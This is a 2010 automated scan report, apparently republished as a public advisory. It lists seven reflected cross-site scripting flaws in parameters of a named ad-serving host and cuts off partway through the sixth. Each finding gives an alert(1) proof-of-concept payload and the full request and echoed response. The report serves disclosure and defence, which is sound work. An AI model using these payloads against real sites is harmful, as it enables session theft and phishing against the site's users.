Advisory: FILTER IP HOST oridtags2.admailtiser.com | XSS Malvertising | Serving Ads | Cross Site Scripting (XSS)

FINGERPRINTED October 25, 2010 - Cross Site Scripting in Ad Serving Network

Report generated by at Tue Oct 26 15:32:33 CDT 2010.


Cross Site Scripting Reports | Hoyt LLC Research

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler

Loading

1. Cross-site scripting (reflected)

1.1. http://oridtags2.admailtiser.com/st [bgcolor parameter]

1.2. http://oridtags2.admailtiser.com/st [cipid parameter]

1.3. http://oridtags2.admailtiser.com/st [clickurl parameter]

1.4. http://oridtags2.admailtiser.com/st [crid parameter]

1.5. http://oridtags2.admailtiser.com/st [fgcolor parameter]

1.6. http://oridtags2.admailtiser.com/st [subid parameter]

1.7. http://oridtags2.admailtiser.com/st [tchannel parameter]



1. Cross-site scripting (reflected)
There are 7 instances of this issue:

Issue background

Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.

The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.

Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).

The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.

Issue remediation

In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.


1.1. http://oridtags2.admailtiser.com/st [bgcolor parameter]  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oridtags2.admailtiser.com
Path:   /st

Issue detail

The value of the bgcolor request parameter is copied into the HTML document as plain text between tags. The payload a1db6<script>alert(1)</script>a89e0a8b1dc was submitted in the bgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00a1db6<script>alert(1)</script>a89e0a8b1dc&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1
Host: oridtags2.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Oct 2010 02:01:46 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Pragma: no-cache
Server: Apache
Set-Cookie: cicouid=65204194-0507-4faf-98b2-80382228e989SjIwIk1O8iGKtoH1d_7-xw; Domain=.admailtiser.com; Expires=Wed, 26-Oct-2011 02:01:46 GMT; Path=/
Set-Cookie: ciconv0=3252818905682761147-e4a810c6-bb44-48e3-9fbd-3167900c3d5d#6186497; Domain=.admailtiser.com; Expires=Wed, 27-Oct-2010 02:01:46 GMT; Path=/
Set-Cookie: JSESSIONID=4C7C482A9092922FC887313E822C1DBB; Path=/
Connection: keep-alive
Content-Length: 23028


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
    <META H
...[SNIP]...
<style>
           body {
               margin: 0;
               padding: 0;
               
                   background-color: #33ff00a1db6<script>alert(1)</script>a89e0a8b1dc;
               
           }
           
           
                           a:link {
                   color: #e60066;
               }
               a:visited {
                   color: #e60066;
               }
               a:hover {
                   color: #e60066;
               }
               a:active {
                   color: #e60066;

...[SNIP]...

1.2. http://oridtags2.admailtiser.com/st [cipid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oridtags2.admailtiser.com
Path:   /st

Issue detail

The value of the cipid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b472e"><script>alert(1)</script>f4de99533c was submitted in the cipid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?cipid=b472e"><script>alert(1)</script>f4de99533c&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1
Host: oridtags2.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Oct 2010 01:53:41 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Pragma: no-cache
Server: Apache
Set-Cookie: cicouid=b693b49e-edb4-43bc-87fd-0a0b0ff918cduT1usNoCku4A4Z9y3s6QtQ; Domain=.admailtiser.com; Expires=Wed, 26-Oct-2011 01:53:41 GMT; Path=/
Set-Cookie: ciconv0=-4229504141834136025-7ef36a18-cdc5-4713-b27f-0c0a3fb9ad68#6186497; Domain=.admailtiser.com; Expires=Wed, 27-Oct-2010 01:53:41 GMT; Path=/
Set-Cookie: JSESSIONID=6B6B46D4376093903FA81E5B4EB007E1; Path=/
Connection: keep-alive
Content-Length: 24763


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
    <META H
...[SNIP]...
<body id="body" onclick="clicked(event, this, 'http://results.searchoverthenet.com/st?ttype=1&cipid=b472e"><script>alert(1)</script>f4de99533c&fac=1&pixels=3&logo=3&cicat=28&cirel=0.4736054741176855&ciconf=1&cidomid=-1786316931187180868&cihid=7&kw=Mtv+music+awards&hl=23&ktc=0345&sid=11223&auth=NTTO&subid=310305&cisid=7ef36a18-cdc5-4713-b27f-
...[SNIP]...

1.3. http://oridtags2.admailtiser.com/st [clickurl parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oridtags2.admailtiser.com
Path:   /st

Issue detail

The value of the clickurl request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 13a58"><script>alert(1)</script>b7205bed805 was submitted in the clickurl parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C13a58"><script>alert(1)</script>b7205bed805&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1
Host: oridtags2.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Oct 2010 02:08:39 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Pragma: no-cache
Server: Apache
Set-Cookie: cicouid=f31d9477-23fe-4ebc-855c-447292dd1d906Fh9qn1bG6N7jE9lCTkrfQ; Domain=.admailtiser.com; Expires=Wed, 26-Oct-2011 02:08:39 GMT; Path=/
Set-Cookie: ciconv0=-5096442572276152765-69a0dd87-4631-4301-b737-8a350ad09719#6186497; Domain=.admailtiser.com; Expires=Wed, 27-Oct-2010 02:08:39 GMT; Path=/
Set-Cookie: JSESSIONID=BDD3A1B20C4167B9795E2E0B9661F93B; Path=/
Connection: keep-alive
Content-Length: 24917


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
    <META H
...[SNIP]...
AAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C13a58"><script>alert(1)</script>b7205bed805');">
...[SNIP]...

1.4. http://oridtags2.admailtiser.com/st [crid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oridtags2.admailtiser.com
Path:   /st

Issue detail

The value of the crid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7b0c"><script>alert(1)</script>2728a73d0ee was submitted in the crid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497d7b0c"><script>alert(1)</script>2728a73d0ee&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1
Host: oridtags2.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Oct 2010 02:11:54 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Pragma: no-cache
Server: Apache
Set-Cookie: cicouid=8f38ae5e-3ac4-4038-a6b7-0cd7b7d10583Uz-YFgqb9yI6EJFdZG2t4A; Domain=.admailtiser.com; Expires=Wed, 26-Oct-2011 02:11:54 GMT; Path=/
Set-Cookie: ciconv0=-410352185772474835-fec10c39-6aa2-4e8d-8adf-33079a1de3dc; Domain=.admailtiser.com; Expires=Wed, 27-Oct-2010 02:11:54 GMT; Path=/
Set-Cookie: JSESSIONID=A1B581EE3CC72714BA4C079570AA0415; Path=/
Connection: keep-alive
Content-Length: 24929


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
    <META H
...[SNIP]...
0.4736054741176855&ciconf=1&cidomid=-1786316931187180868&cihid=7&kw=Medical+transport&hl=23&ktc=0337&sid=11223&auth=NTTO&subid=310305&cisid=fec10c39-6aa2-4e8d-8adf-33079a1de3dc&imgpid=6265&crid=6186497d7b0c"><script>alert(1)</script>2728a73d0ee&cict=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAA
...[SNIP]...

1.5. http://oridtags2.admailtiser.com/st [fgcolor parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oridtags2.admailtiser.com
Path:   /st

Issue detail

The value of the fgcolor request parameter is copied into the HTML document as plain text between tags. The payload d56be<script>alert(1)</script>8a50f2fbe8a was submitted in the fgcolor parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066d56be<script>alert(1)</script>8a50f2fbe8a&cilp=&subid=310305&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1
Host: oridtags2.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Oct 2010 02:03:57 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Pragma: no-cache
Server: Apache
Set-Cookie: cicouid=f332bb6e-b570-4a4c-8705-aca8ff2f8696VzYv9jObg27ljvEkXj1Kjg; Domain=.admailtiser.com; Expires=Wed, 26-Oct-2011 02:03:57 GMT; Path=/
Set-Cookie: ciconv0=3929565476170258706-b45bb0b9-0268-4c35-82e3-b3392bb8fb47#6186497; Domain=.admailtiser.com; Expires=Wed, 27-Oct-2010 02:03:57 GMT; Path=/
Set-Cookie: JSESSIONID=C5353CAD5BC06F1EA4B5B4147341382D; Path=/
Connection: keep-alive
Content-Length: 24189


<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd">


<html>
   <head>
    <META H
...[SNIP]...
<style>
           body {
               margin: 0;
               padding: 0;
               
                   background-color: #33ff00;
               
           }
           
           
                           a:link {
                   color: #e60066d56be<script>alert(1)</script>8a50f2fbe8a;
               }
               a:visited {
                   color: #e60066d56be<script>
...[SNIP]...

1.6. http://oridtags2.admailtiser.com/st [subid parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://oridtags2.admailtiser.com
Path:   /st

Issue detail

The value of the subid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ada82"><script>alert(1)</script>48bc0c64bc2 was submitted in the subid parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /st?cipid=7780291&width=728&height=90&tchannel=11223&auth=NTTO&bgcolor=33ff00&fgcolor=e60066&cilp=&subid=310305ada82"><script>alert(1)</script>48bc0c64bc2&clickurl=http%3A%2F%2Fad%2Emedia%2Dservers%2Enet%2Fclk%3F2%2C13%253B8477a2e58c7b5b9a%253B12be639a2c0%2C0%253B%253B%253B3662490593%2CAAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB%2DxyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAwKI55isBAAAAAAAAADNlNDYxYTkyLWUwYTMtMTFkZi05NzBmLTAwMzA0OGQ1NjNiMAAAAAAAAAA%3D%2C%2Chttp%253A%252F%252Fwww%2Edjhungama%2Ecom%252Findex%2Ephp%253Fshowtopic%253D41667%2C&cict_unencoded=0&crid=6186497&vurlid=0&blid=2148222&secid=1259846&sitid=&catid=0&srcurl=http%3A%2F%2Fwww%2Edjhungama%2Ecom%2Findex%2Ephp%3Fshowtopic%3D41667&qs= HTTP/1.1
Host: oridtags2.admailtiser.com
Proxy-Connection: keep-alive
Referer: http://ad.yieldmanager.com/iframe3?AAAAAEY5EwABZl4AAAAAAK2WGAAAAAAAAgAAAAYAAAAAAP8AAAACFVpDHwAAAAAAmOwSAAAAAAB-xyAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAD46AsAAAAAAAIAAwAAAAAAAAAAAAAAAAAAAAB8ngCiPwAAAAAAAAAAAAAAfJ4Asj8AAAAAAAAAAAAAABvGgLY.AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAACC4QOnHRgPCeUakdKV1RzEFDkOjnnzs1uXPh7VAAAAAA==,,http%3A%2F%2Fwww.djhungama.com%2Findex.php%3Fshowtopic%3D41667,Z%3D728x90%26s%3D1259846%26_salt%3D2775652930%26B%3D10%26u%3Dhttp%253A%252F%252Fwww.djhungama.com%252Findex.php%253Fshowtopic%253D41667%26r%3D0,3e461a92-e0a3-11df-970f-003048d563b0
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.41 Safari/534.7
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, must-revalidate
Content-Type: text/html;charset=UTF-8
Date: Tue, 26 Oct 2010 02:07:00 GMT
Expires: Sat, 26 Jul 1997 05:00:00 GMT
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
P3P: policyref="http://admailtiser.com/w3c/p3p.xml", CP="NOI DSP COR CURa OUR NOR UNI"
Pragma: no-cache
Server: Apache
Set-Cookie: cicouid=003abe5f-79bc-43fc-9364-826cfe0046173aMDFvBcbftkd_ORRQeLcQ; Domain=.admailtiser.com; Expires=Wed, 26-Oct-2011 02:07:00 GMT; Path=/
